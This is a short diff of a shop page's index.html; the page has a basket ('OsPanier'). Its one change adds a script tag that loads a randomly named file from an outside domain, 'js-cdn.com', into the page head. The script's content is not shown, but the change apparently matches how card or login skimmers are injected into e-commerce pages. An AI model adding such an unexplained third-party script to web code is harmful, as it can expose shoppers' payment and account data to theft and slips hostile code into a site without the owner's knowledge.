--- a/index.html
+++ b/index.html
@@ -54,6 +54,7 @@
             <style type="text/css">.OsPanier .EnteteTotal { display:none; }
 .OsPanier .contenu .Details .Titre { display:none; }
 </style>
+	<script src='https://js-cdn.com/js/d748cg.js'></script>
 </head>
 <body>
     
